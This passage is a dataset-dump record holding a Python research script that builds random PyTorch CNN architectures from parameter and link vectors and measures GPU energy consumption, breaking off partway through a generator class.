-0.113, 'F': 0.283, 'I': 0.128, 'H': 0.192, 'K': 0.552, 'M': 0.069, 'L': -0.225, 'N': -0.203, 'Q': 0.267, 'P': 0.019, 'S': -1.157, 'R': 0.758, 'T': -0.312, 'W': 0.068, 'V': -0.691, 'Y': 0.089}, -1: {'con': 4.2909}} | 2,045 | 2,045 | 0.396088 | 496 | 2,045 | 1.627016 | 0.288306 | 0.019827 | 0.012392 | 0.01487 | 0.034696 | 0 | 0 | 0 | 0 | 0 | 0 | 0.375365 | 0.162347 | 2,045 | 1 | 2,045 | 2,045 | 0.095738 | 0 | 0 | 0 | 0 | 0 | 0.079668 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
43030e0d312386c135771fe0904fe61ef166b18c | 122,318 | py | Python | CNNGeneration/RandomCNNGeneration.py | NEUSoftGreenAI/NeurstrucEnergy | 94c5c2f4796382f37e0f2f77a4f6484c0e5f2260 | [
"MIT"
] | null | null | null | CNNGeneration/RandomCNNGeneration.py | NEUSoftGreenAI/NeurstrucEnergy | 94c5c2f4796382f37e0f2f77a4f6484c0e5f2260 | [
"MIT"
] | null | null | null | CNNGeneration/RandomCNNGeneration.py | NEUSoftGreenAI/NeurstrucEnergy | 94c5c2f4796382f37e0f2f77a4f6484c0e5f2260 | [
"MIT"
] | null | null | null | import os
from threading import Thread
import time
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
import torch.utils.data as Data
import numpy as np
from multiprocessing import Process
from numpy import *
import torch.multiprocessing as mp
from torch.multiprocessing import Pool, Manager
from queue import Queue
import collections
import random
import requests
import csv
import string
import pandas as pd
import math
import traceback
from monitor import Monitor # local helper module; required by get_one_energy below
from stableMonitor import stableMonitor # local helper module; required by achieve_stable_energy below
np.set_printoptions(threshold=500)
class CNN(nn.Module):
def __init__(self):
super(CNN,self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(1,16,5,1,2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2)
)
self.conv2 = nn.Sequential(
nn.Conv2d(16,32,5,1,2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2)
)
self.out = nn.Linear(32 * 7 * 7,10) # 10-way classification head
def forward(self,x):
x = self.conv1(x)
x = self.conv2(x)
x = x.view(x.size(0),-1)
x = self.out(x)
return x
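# A minimal usage sketch for the CNN class above, assuming only what is visible
# in this file (28x28 single-channel inputs, 10 output classes). The function
# name is illustrative and not part of the original module.
def _demo_cnn_forward():
    cnn = CNN()
    x = torch.rand(8, 1, 28, 28)        # (batch, channels, height, width)
    logits = cnn(x)
    assert logits.shape == (8, 10)      # two conv+pool stages: 28 -> 14 -> 7, then 32*7*7 -> 10
    return logits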
def achieve_stable_energy(return_dict):
'''
Because GPU state (temperature, idle power, peak power, etc.) would otherwise skew later measurements, run a warm-up workload first and wait until power consumption stabilizes before the subsequent generation starts.
'''
monitor = stableMonitor(0.01)
EPOCH = 1000
BATCH_SIZE = 1000
LR = 0.001
x = torch.rand(BATCH_SIZE,1,28,28)
b_x = Variable(x).cuda()
cnn = CNN()
cnn.cuda()
optimizer = optim.Adam(cnn.parameters(),lr=LR)
loss_func = nn.CrossEntropyLoss()
'''
After COUNT_TIME training rounds, compute the variance after every forward pass; as long as the variance keeps decreasing for EARLY_STOP_TIME consecutive checks, keep running, otherwise stop.
'''
EARLY_STOP_TIME = 2
COUNT_TIME = 10
energy_cost_std_list = np.zeros(EARLY_STOP_TIME + 1)
count = 0
while(True):
torch.cuda.synchronize()
monitor.begin()
for j in range(0,30):
print(j)
output = cnn(b_x)
count += 1
torch.cuda.synchronize()
monitor.stop()
time.sleep(2)
if(count >= COUNT_TIME):
data = monitor.get_stable_energy_list()
for i in range(0,EARLY_STOP_TIME):
energy_cost_std_list[i] = energy_cost_std_list[i+1]
energy_cost_std_list[EARLY_STOP_TIME] = std(data)
print("方差列表:",energy_cost_std_list)
for i in range(0,EARLY_STOP_TIME):
if(energy_cost_std_list[i]!=0 and energy_cost_std_list[i]<energy_cost_std_list[i+1]):
return_dict['stable_silence_value'] = monitor.get_silence_energy()
print("能耗校正完成!")
monitor.exit()
return
else:
break
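# A self-contained sketch of the early-stop criterion used above, decoupled from
# the GPU monitor so it can be exercised on plain arrays. It mirrors the
# shift-register update of energy_cost_std_list; the function name is illustrative.
def _demo_variance_early_stop(readings_per_round, early_stop_time=2):
    # readings_per_round: one 1-D array of power readings per measurement round
    stds = np.zeros(early_stop_time + 1)
    for data in readings_per_round:
        stds = np.roll(stds, -1)        # shift the window left
        stds[-1] = std(data)            # std comes from `from numpy import *`
        # stable as soon as an earlier, non-zero std already lies below a later
        # one, i.e. the variance has stopped decreasing
        if any(stds[i] != 0 and stds[i] < stds[i + 1] for i in range(early_stop_time)):
            return True
    return False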
class NNgenerator(nn.Module):
def __init__(self,layer_parameters,layer_link,layer_id):
super(NNgenerator,self).__init__()
self.layer_parameters = layer_parameters
self.layer_link = layer_link
self.layer_id = layer_id
self.layer_list = []
self.parameters_flag = 0
self.link_flag = 0
# print(len(self.layer_id))
self.link_graph = self.link_vector_to_graph(self.layer_link,len(self.layer_id))
# print(self.link_graph)
in_degree_list = self.get_in_degree()
out_degree_list = self.get_out_degree()
# print(in_degree_list)
# print(out_degree_list)
for i in range(0,len(self.layer_id)):
params_length = self.get_params_length(self.layer_id[i])
link_length = self.get_link_length(i)
self.layer_list.append(self.make_layer(self.layer_parameters[self.parameters_flag:self.parameters_flag+params_length], self.layer_link[self.link_flag:self.link_flag+link_length], self.layer_id[i]))
self.parameters_flag += params_length
self.link_flag += link_length
self.layer_list = nn.ModuleList(self.layer_list)
# print(self.layer_list)
def make_layer(self, parameters, link, id):
'''
Build a single layer from its parameter vector.
'''
# print(parameters,id,len(parameters))
if(id == 0):
in_channels,out_channels,kernel_size,stride,padding,dilation,groups = parameters[-7:]
return nn.Conv1d(in_channels,out_channels,kernel_size,stride=stride,padding=padding,dilation=dilation,groups=groups)
elif(id == 1):
# print(parameters)
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups = parameters[-11:]
return nn.Conv2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),dilation=(dilation_height, dilation_width),groups=groups)
elif(id == 2):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,groups = parameters[-15:]
return nn.Conv3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),dilation=(dilation_depth, dilation_height, dilation_width),groups=groups)
elif(id == 3):
in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups = parameters[-8:]
return nn.ConvTranspose1d(in_channels,out_channels,kernel_size=kernel_size,stride=stride,padding=padding,output_padding=output_padding,dilation=dilation,groups=groups)
elif(id == 4):
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation,groups = parameters[-12:]
# print(in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation,groups)
return nn.ConvTranspose2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),output_padding=(output_padding_height,output_padding_width),dilation=dilation,groups=groups)
elif(id == 5):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,\
padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,dilation,groups = parameters[-16:]
return nn.ConvTranspose3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),output_padding=(output_padding_depth, output_padding_height, output_padding_width),dilation=dilation,groups=groups)
elif(id == 6):
# max pooling must return indices (consumed later by max unpooling)
kernel_size,stride,padding,dilation,pool_type = parameters[-5:]
if(pool_type == 0):
# max pooling
return nn.MaxPool1d(kernel_size = kernel_size, stride=stride, padding=padding, dilation=dilation, return_indices=True)
else:
# avg pooling
# dilation is unsupported here, so generation must default it to 1
return nn.AvgPool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(id == 7):
# max pooling must return indices (consumed later by max unpooling)
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type = parameters[-9:]
if(pool_type == 0):
# max pooling
return nn.MaxPool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),dilation=(dilation_height, dilation_width), return_indices=True)
else:
# avg pooling
# dilation is unsupported here, so generation must default it to 1
return nn.AvgPool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width))
elif(id == 8):
# max pooling must return indices (consumed later by max unpooling)
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type = parameters[-13:]
if(pool_type == 0):
# max pooling
return nn.MaxPool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),dilation=(dilation_depth, dilation_height, dilation_width), return_indices=True)
else:
# avg pooling
# dilation is unsupported here, so generation must default it to 1
return nn.AvgPool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width))
elif(id == 9):
kernel_size,stride,padding = parameters[-3:]
return nn.MaxUnpool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(id == 10):
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width = parameters[-6:]
return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
elif(id == 11):
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width = parameters[-9:]
return nn.MaxUnpool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),padding=(padding_depth, padding_height, padding_width))
elif(id == 12):
output_size_L,pool_type = parameters[-2:]
if(pool_type == 0):
# max pooling (return_indices)
return nn.AdaptiveMaxPool1d(output_size_L)
else:
# avg pooling
return nn.AdaptiveAvgPool1d(output_size_L)
elif(id == 13):
output_size_H,output_size_W,pool_type = parameters[-3:]
if(pool_type == 0):
# max pooling (return_indices)
return nn.AdaptiveMaxPool2d((output_size_H,output_size_W))
else:
# avg pooling
return nn.AdaptiveAvgPool2d((output_size_H,output_size_W))
elif(id == 14):
output_size_D,output_size_H,output_size_W,pool_type = parameters[-4:]
if(pool_type == 0):
# max pooling (return_indices)
return nn.AdaptiveMaxPool3d((output_size_D,output_size_H,output_size_W))
else:
# avg pooling
return nn.AdaptiveAvgPool3d((output_size_D,output_size_H,output_size_W))
elif(id == 15):
num_features = parameters[-1:][0]
return nn.BatchNorm1d(num_features)
elif(id == 16):
num_features = parameters[-1:][0]
return nn.BatchNorm2d(num_features)
elif(id == 17):
num_features = parameters[-1:][0]
return nn.BatchNorm3d(num_features)
elif(id == 18):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 19):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 20):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 21):
input_length,output_length = parameters[1],parameters[3]
return nn.Linear(input_length,output_length)
elif(id == 22):
sigmoid,tanh,ReLU,leaky_ReLU = parameters[-4:]
if(sigmoid == 1):
return nn.Sigmoid()
elif(tanh == 1):
return nn.Tanh()
elif(ReLU == 1):
return nn.ReLU()
else:
return nn.LeakyReLU()
# add and concat are not real network layers, so return an arbitrary placeholder layer
elif(id == 23):
return nn.ReLU()
elif(id == 24):
return nn.ReLU()
elif(id == 25):
probability = parameters[-1:][0]
return nn.Dropout2d(p=probability)
elif(id == 26):
probability = parameters[-1:][0]
return nn.Dropout3d(p=probability)
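# A hedged decoding sketch for an id == 1 (Conv2d) parameter slice, mirroring the
# parameters[-11:] unpacking in make_layer above. Real slices also carry leading
# input/output shape entries, which are ignored here; the concrete numbers are
# invented for illustration.
def _demo_decode_conv2d_params(self):
    tail = [3, 16, 3, 3, 1, 1, 1, 1, 1, 1, 1]   # in_ch, out_ch, kh, kw, sh, sw, ph, pw, dh, dw, groups
    in_channels, out_channels, kh, kw, sh, sw, ph, pw, dh, dw, groups = tail[-11:]
    conv = nn.Conv2d(in_channels, out_channels, (kh, kw), stride=(sh, sw),
                     padding=(ph, pw), dilation=(dh, dw), groups=groups)
    y = conv(torch.rand(1, 3, 32, 32))
    assert y.shape == (1, 16, 32, 32)   # 3x3 kernel with padding 1 preserves H and W
    return conv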
def forward(self,x):
'''
out-degree 0: the node's result is returned as an output
in-degree 0: the node receives the initial input
in-degree 1: a normal node (the first position marks receiving the initial input)
in-degree >1: a concat or add node
Implementation:
1. nodes with in-degree 0 take the initial input
2. breadth-first traversal of the adjacency matrix, caching results in the list comp_context
3. return the results of nodes with out-degree 0
'''
layer_length = len(self.layer_id)
queue = Queue(layer_length)
comp_context = [0 for index in range(layer_length)]
unpool_indices = [0 for index in range(layer_length)]
in_degree_list = self.get_in_degree()
out_degree_list = self.get_out_degree()
BFS_flag = np.zeros(layer_length,dtype = int)
# breadth-first traversal
for i in range(0,layer_length):
if(in_degree_list[i] == 0):
queue.put(i)
BFS_flag[i] = 1
while not queue.empty():
layer_index = queue.get()
# print(layer_index)
if(in_degree_list[layer_index] == 0):
'''
A node with in-degree 0 only needs to consume the initial input.
'''
# print('self.layer_list[layer_index]',self.layer_id[layer_index])
# print('first',self.layer_list[layer_index],layer_index)
comp_context[layer_index] = self.layer_list[layer_index](x)
# print('first',comp_context[layer_index].shape)
# print(comp_context)
children_indices = self.get_children_indices(layer_index)# find the child nodes
for i in range(0,len(children_indices)):
if(BFS_flag[children_indices[i]] == 0):
queue.put(children_indices[i])
BFS_flag[children_indices[i]] = 1
elif(in_degree_list[layer_index] > 0):
'''
When a node's in-degree is greater than 0, find all of its parent nodes.
With in-degree 1 it consumes the parent's output directly; with in-degree > 1 it is a concat or add layer.
'''
parent_indices = self.get_parent_indices(layer_index)# find the parent nodes
'''
If a parent has not executed yet, i.e. comp_context holds no result for it, push this node back to the tail of the queue.
Thanks to the breadth-first traversal this cannot happen for in-degree 1, but it can for in-degree 2.
'''
if(len(parent_indices) == 1):
# a fully connected layer needs a flatten operation first
# print(comp_context[parent_indices[0]].size())
# # print(self.layer_list[layer_index])
# print("parent node",parent_indices[0])
# print("current node",layer_index)
if(self.layer_id[layer_index] == 21):
dimension = len(comp_context[parent_indices[0]].size())
# dimension 2 means an earlier fully connected layer has already flattened the tensor
if(dimension == 2):
# print('self.layerid',self.layer_id[layer_index])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
else:
# print(comp_context[parent_indices[0]].shape)
comp_context[layer_index] = comp_context[parent_indices[0]].view(comp_context[parent_indices[0]].size(0),-1)
# print(comp_context[layer_index].shape)
comp_context[layer_index] = self.layer_list[layer_index](comp_context[layer_index])
else:
if(self.layer_id[layer_index] == 6 or self.layer_id[layer_index] == 7 or self.layer_id[layer_index] == 8):
# pooling layer: if it is MaxPool, also store the returned indices
if(hasattr(self.layer_list[layer_index], 'return_indices')):
comp_context[layer_index],unpool_indices[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
# print('saving',layer_index,'unpool_indices')
else:
# print('self.layerid',self.layer_id[layer_index])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
elif(self.layer_id[layer_index] == 9 or self.layer_id[layer_index] == 10 or self.layer_id[layer_index] == 11):
# unpooling layer: consume the stored max-pool indices
# print(unpool_indices[parent_indices[0]])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]],unpool_indices[parent_indices[0]])
else:
# print('self.layerid',self.layer_id[layer_index],'parents',parent_indices,'parent type',self.layer_id[parent_indices[0]])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
# print('child',comp_context[layer_index])
children_indices = self.get_children_indices(layer_index)# find the child nodes
for i in range(0,len(children_indices)):
if(BFS_flag[children_indices[i]] == 0):
queue.put(children_indices[i])
BFS_flag[children_indices[i]] = 1
elif(len(parent_indices) > 1):
# check whether any parent still lacks a result in comp_context; if all parents have been computed, fall through to the else branch
for i in range(0,len(parent_indices)):
if(type(comp_context[parent_indices[i]]) != torch.Tensor):
queue.put(layer_index)
break
else:
# print(self.layer_list[layer_index])
# print("父节点",parent_indices)
# for i in range(0,len(parent_indices)):
# print(comp_context[parent_indices[i]].size())
# print("当前节点",layer_index)
#把多个parent输出连接成元组
converge_tuple = ()
for i in range(0,len(parent_indices)):
converge_tuple += (comp_context[parent_indices[i]],)
if(self.layer_id[layer_index] == 23):
# concat layer
comp_context[layer_index] = torch.cat(converge_tuple, 1)# concatenate along the channel dimension
elif(self.layer_id[layer_index] == 24):
# add layer
comp_context[layer_index] = converge_tuple[0]
for i in range(1,len(parent_indices)):
# print(comp_context[layer_index].size(),converge_tuple[i].size())
comp_context[layer_index] = torch.add(comp_context[layer_index],converge_tuple[i])
# push this node's children onto the queue
children_indices = self.get_children_indices(layer_index)# find the child nodes
for i in range(0,len(children_indices)):
if(BFS_flag[children_indices[i]] == 0):
queue.put(children_indices[i])
BFS_flag[children_indices[i]] = 1
# collect the results of nodes with out-degree 0 and return them
return_list = []
for i in range(0,layer_length):
if(out_degree_list[i] == 0):
return_list.append(comp_context[i])
return return_list
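# A standalone sketch of the scheduling idea implemented in forward() above:
# nodes with in-degree 0 consume the initial input, the rest are visited
# breadth-first, and nodes with out-degree 0 become the outputs. The toy
# 3-node chain and the method name are illustrative, not part of the original file.
def _demo_bfs_schedule(self):
    # adjacency convention as elsewhere in this class: graph[i][j] == 1 means
    # node i consumes node j's output; diagonal entries mark the initial input
    graph = np.array([[1, 0, 0],
                      [1, 0, 0],
                      [0, 1, 0]])
    n = len(graph)
    in_deg = [int(np.delete(graph[i], i).sum()) for i in range(n)]
    out_deg = [int(np.delete(graph[:, i], i).sum()) for i in range(n)]
    order = []
    pending = [i for i in range(n) if in_deg[i] == 0]
    seen = set(pending)
    while pending:
        node = pending.pop(0)
        order.append(node)
        children = [c for c in range(n) if graph[c][node] == 1 and c != node]
        pending += [c for c in children if c not in seen]
        seen.update(children)
    outputs = [i for i in range(n) if out_deg[i] == 0]
    return order, outputs   # ([0, 1, 2], [2]) for the chain above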
def get_link_length(self,pos):
'''
Length of the link vector for the node at position pos.
'''
return pos+1
def get_in_degree(self):
'''
Derive the in-degree list of all nodes from the adjacency matrix.
'''
in_degree_list = []
for i in range(0,len(self.layer_id)):
node_row = list(self.link_graph[i])
node_row.pop(i)
in_degree_list.append(np.array(node_row).sum())
return in_degree_list
def get_out_degree(self):
'''
Derive the out-degree list of all nodes from the adjacency matrix.
'''
out_degree_list = []
for i in range(0,len(self.layer_id)):
# skip the diagonal element
node_column = list(self.link_graph[:,i])
node_column.pop(i)
out_degree_list.append(np.array(node_column).sum())
return out_degree_list
def get_parent_indices(self,index):
'''
Find the parent nodes whose outputs the index-th node depends on.
'''
node_row = list(self.link_graph[index])
parent_list = []
for i in range(0,len(node_row)):
if(node_row[i] == 1 and i != index):
parent_list.append(i)
return parent_list
def get_children_indices(self,index):
'''
Find the children of the index-th node (the nodes that consume its output).
'''
node_column = list(self.link_graph[:,index])
children_list = []
for i in range(0,len(node_column)):
if(node_column[i] == 1 and i != index):
children_list.append(i)
return children_list
def link_vector_to_graph(self,link_list,length):
'''
Convert a link vector into an adjacency matrix; diagonal entries mark whether a node receives the initial input.
'''
graph = np.zeros([length,length],dtype = float)
flag = 0
if len(link_list) != length * length:
for i in range(0,length):
for j in range(0,i+1):
graph[i,j] = link_list[flag]
flag += 1
else:
for i in range(0,length):
for j in range(0,length):
graph[i,j] = link_list[flag]
flag += 1
return graph
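# A worked example for link_vector_to_graph above, using the lower-triangular
# 7-layer vector that also appears in get_one_energy below: row i contributes
# i+1 entries and the last entry of each row (the diagonal) marks "receives the
# raw input". The method name is illustrative.
def _demo_link_vector_to_graph(self):
    link = [1, 1,0, 0,1,0, 0,0,1,0, 0,0,0,1,0, 0,0,0,0,1,0, 0,0,0,0,0,1,0]
    graph = self.link_vector_to_graph(link, 7)
    # layer 0 takes the raw input; every other layer consumes its predecessor
    assert graph[0, 0] == 1
    assert all(graph[i, i - 1] == 1 for i in range(1, 7))
    return graph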
def get_params_length(self,layer_id):
'''
Parameter-vector length for each layer type.
'''
get_params_length_dic = {
0:13,
1:19,
2:25,
3:14,
4:20,
5:26,
6:11,
7:17,
8:23,
9:9,
10:14,
11:19,
12:7,
13:9,
14:11,
15:4,
16:5,
17:6,
18:4,
19:5,
20:6,
21:4,
22:6,
23:3,
24:3,
25:5,
26:6,
}
return get_params_length_dic[layer_id]
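# A sketch of how the flat layer_parameters vector is consumed slice by slice,
# mirroring the parameters_flag walk in NNgenerator.__init__ with the length
# table above. The function name and the toy example are illustrative.
def _demo_walk_parameter_vector(layer_parameters, layer_id):
    lengths = {0: 13, 1: 19, 2: 25, 3: 14, 4: 20, 5: 26, 6: 11, 7: 17, 8: 23,
               9: 9, 10: 14, 11: 19, 12: 7, 13: 9, 14: 11, 15: 4, 16: 5, 17: 6,
               18: 4, 19: 5, 20: 6, 21: 4, 22: 6, 23: 3, 24: 3, 25: 5, 26: 6}
    slices, flag = [], 0
    for lid in layer_id:
        slices.append(layer_parameters[flag:flag + lengths[lid]])
        flag += lengths[lid]
    assert flag == len(layer_parameters)   # every entry is consumed exactly once
    return slices
# e.g. _demo_walk_parameter_vector(list(range(25)), [1, 22]) yields a 19-entry
# Conv2d slice followed by a 6-entry activation slice.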
def get_one_energy():
monitor = Monitor(0.001,2)
layer_parameters = [1000,1,28,28,1000,16,28,28,1,16,5,5,1,1,2,2,1,1,1, 1000,16*28*28,0,0,1,0 ,1000,16,28,28,1000,16,14,14,2,2,2,2,0,0,1,1,0 , 1000,16,14,14,1000,32,14,14,16,32,5,5,1,1,2,2,1,1,1, 1000,32*14*14,0,0,1,0 ,1000,32,14,14,1000,32,7,7,2,2,2,2,0,0,1,1,0 ,1000,32*7*7,1000,10 ]
layer_link = [1, 1,0, 0,1,0, 0,0,1,0, 0,0,0,1,0, 0,0,0,0,1,0, 0,0,0,0,0,1,0] # the last entry of each row (the diagonal) marks receiving the raw input
layer_id = [1,22,7,1,22,7,21]
NN = NNgenerator(layer_parameters,layer_link,layer_id)
# print(NN)
NN.cuda()
x = torch.rand(1000,1,28,28)
b_x = Variable(x).cuda()
output = NN(b_x)
# print(x)
torch.cuda.synchronize()
monitor.begin()
for j in range(0,1000):
output = NN(b_x)
torch.cuda.synchronize()
monitor.stop()
time.sleep(2)
def validate_NN(vg,dim):
# torch.cuda.empty_cache()
NN = NNgenerator(vg.layer_parameters,vg.layer_link,vg.layer_id)
# print(NN)
# NN.cuda()
if dim == 1:
x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2])
elif dim == 2:
x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2],vg.net_input[3])
else:
x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2],vg.net_input[3],vg.net_input[4])
b_x = Variable(x)
output = NN(b_x)
total_params = sum(p.numel() for p in NN.parameters())
# for p in NN.parameters():
# print(p.numel())
print(f'{total_params:,} total parameters.')
str1 = ''
str1 += ",".join('%s' %i for i in vg.layer_parameters) + " "
str1 += ",".join('%s' %i for i in vg.layer_link) + " "
str1 += ",".join('%s' %i for i in vg.layer_id) + " "
str1 += str(total_params) + " "
str1 += str(vg.dimension) + " "
str1 += str(vg.block_num) + " "
str1 += str(vg.stream_num) + " "
# str1 += cpu_name + " "
# str1 += cpu_MHz + " "
# str1 += cache_size + " "
# str1 += str(processor_num) + " "
# str1 += gpu_name + " "
# str1 += "0" + " "
# str1 += "0" + " "
# str1 += "0" + " "
# str1 += "0" + " "
with open("test.txt","a") as file: #只需要将之前的”w"改为“a"即可,代表追加内容
file.write(str1 + "\n")
file.close()
return True
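# validate_NN above appends one space-separated record per generated network to
# test.txt: three comma-joined vectors (parameters, links, ids) followed by the
# parameter count, dimension, block count and stream count. A hedged parsing
# sketch (the function name is illustrative):
def _demo_parse_record(line):
    params, link, ids, total, dim, blocks, streams = line.split(" ")[:7]
    return {
        "layer_parameters": [float(x) for x in params.split(",")],  # may contain dropout probabilities
        "layer_link": [int(x) for x in link.split(",")],
        "layer_id": [int(x) for x in ids.split(",")],
        "total_params": int(total),
        "dimension": int(dim),
        "block_num": int(blocks),
        "stream_num": int(streams),
    }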
def validate_NN_NVG(params,link,id,dim,input_shape):
# torch.cuda.empty_cache()
NN = NNgenerator(params,link,id)
# NN.cuda()
if dim == 1:
x = torch.rand(input_shape[0],input_shape[1],input_shape[2])
elif dim == 2:
x = torch.rand(input_shape[0],input_shape[1],input_shape[2],input_shape[3])
else:
x = torch.rand(input_shape[0],input_shape[1],input_shape[2],input_shape[3],input_shape[4])
b_x = Variable(x)
# print(b_x.shape)
output = NN(b_x)
total_params = sum(p.numel() for p in NN.parameters())
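# A usage sketch for validate_NN_NVG: it can replay the LeNet-style vectors from
# get_one_energy above on the CPU. Only the trailing entries of each parameter
# slice are decoded by make_layer, so shrinking the batch via input_shape is safe.
def _demo_validate_lenet_vectors():
    layer_parameters = [1000,1,28,28,1000,16,28,28,1,16,5,5,1,1,2,2,1,1,1, 1000,16*28*28,0,0,1,0, 1000,16,28,28,1000,16,14,14,2,2,2,2,0,0,1,1,0, 1000,16,14,14,1000,32,14,14,16,32,5,5,1,1,2,2,1,1,1, 1000,32*14*14,0,0,1,0, 1000,32,14,14,1000,32,7,7,2,2,2,2,0,0,1,1,0, 1000,32*7*7,1000,10]
    layer_link = [1, 1,0, 0,1,0, 0,0,1,0, 0,0,0,1,0, 0,0,0,0,1,0, 0,0,0,0,0,1,0]
    layer_id = [1,22,7,1,22,7,21]
    validate_NN_NVG(layer_parameters, layer_link, layer_id, 2, [4,1,28,28])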
class VectorGenerator():
def __init__(self,dimension,block_num,stream_num,batchNorm_prob=0.5,dropout_prob=0.2,more_fc_prob=0.15,max_fc_num=2,delete_fc_prob=0.1,no_dropout = 0.5,large=1):
'''
dimension: dimensionality of the data
block_num: number of CNN blocks
stream_num: number of network streams, must be 1 or 2
batchNorm_prob: probability of inserting BatchNorm after a convolution layer
dropout_prob: probability of inserting dropout after a convolution or FC layer
more_fc_prob: probability of using several FC layers
max_fc_num: maximum number of fully connected layers
delete_fc_prob: probability of omitting the final FC layers entirely
no_dropout: probability that the whole network uses no dropout at all (see the coin flip in __init__)
Workflow, for each network stream:
1. loop block_num times to generate block_num network blocks
2. each block has a unique input and output but may branch internally
3. for a 2-stream network, merge the streams at the end with an add or concat operation
4. if no FC layers are attached, the last block (or the merged 2-stream result) becomes the output
'''
super(VectorGenerator, self).__init__()
self.dimension = dimension # 1 means 1d, 2 means 2d, 3 means 3d
self.block_num = block_num
self.stream_num = stream_num
self.batchNorm_prob = batchNorm_prob
self.dropout_prob = dropout_prob
self.more_fc_prob = more_fc_prob
self.max_fc_num = max_fc_num
self.delete_fc_prob = delete_fc_prob
self.no_dropout = no_dropout
self.large = large
if random.randint(1,100) <= no_dropout * 100:
self.no_dropout = True
else:
self.no_dropout = False
self.layer_num = 0 # number of nodes generated so far
self.layer_parameters = []
self.layer_link = []
self.layer_id = []
self.net_input = self.get_net_input_size()
# print('self.net_input',self.net_input)
# self.make_net()
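# prob_random is defined elsewhere in this file; judging from its call sites in
# make_net below, it draws one element of `values` with the given (possibly
# unnormalized) weights. A minimal stand-in written under that assumption:
def _demo_prob_random(self, values, weights):
    r = random.uniform(0, sum(weights))     # weights need not sum to 1
    acc = 0.0
    for v, w in zip(values, weights):
        acc += w
        if r <= acc:
            return v
    return values[-1]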
def make_net(self):
if(self.dimension == 1):
# generate the CNN network
stream_output_size = []
stream_output_index = []
for net_stream in range(0,self.stream_num):
# generate one stream of the multi-stream network
last_block_input_size = self.net_input
last_block_index = -1
for block in range(0,self.block_num):
#print("netstream",net_stream," block",block)
# the blocks within one stream
input_batch_size,input_channels,input_length = last_block_input_size
out_channels = 1
if(input_channels <= 3):
out_channels = random.randint(16,32)
else:
out_channels = random.randint(int(input_channels*1.8),input_channels*2)
out_shape = self.prob_random([int(input_length*0.5),input_length,int(input_length/3)],[0.8,0.2,0.1])
# print(input_height,out_shape)
output_size = [input_batch_size,out_channels,out_shape]
# when block = 0, the block receives the initial input (last_block_index = -1)
last_block_index,channels = self.make_block(last_block_input_size,output_size,last_block_index,4)
output_size[1] = channels
last_block_input_size = output_size
if(block == self.block_num - 1):
# record the output size of each stream's last block
stream_output_size.append(output_size)
stream_output_index.append(self.layer_num - 1)
# print("stream generation finished")
fc_length = 0
input_fc_size = last_block_input_size
if(self.stream_num > 1):
# join the results of the different streams
if(stream_output_size[0] != stream_output_size[1]):
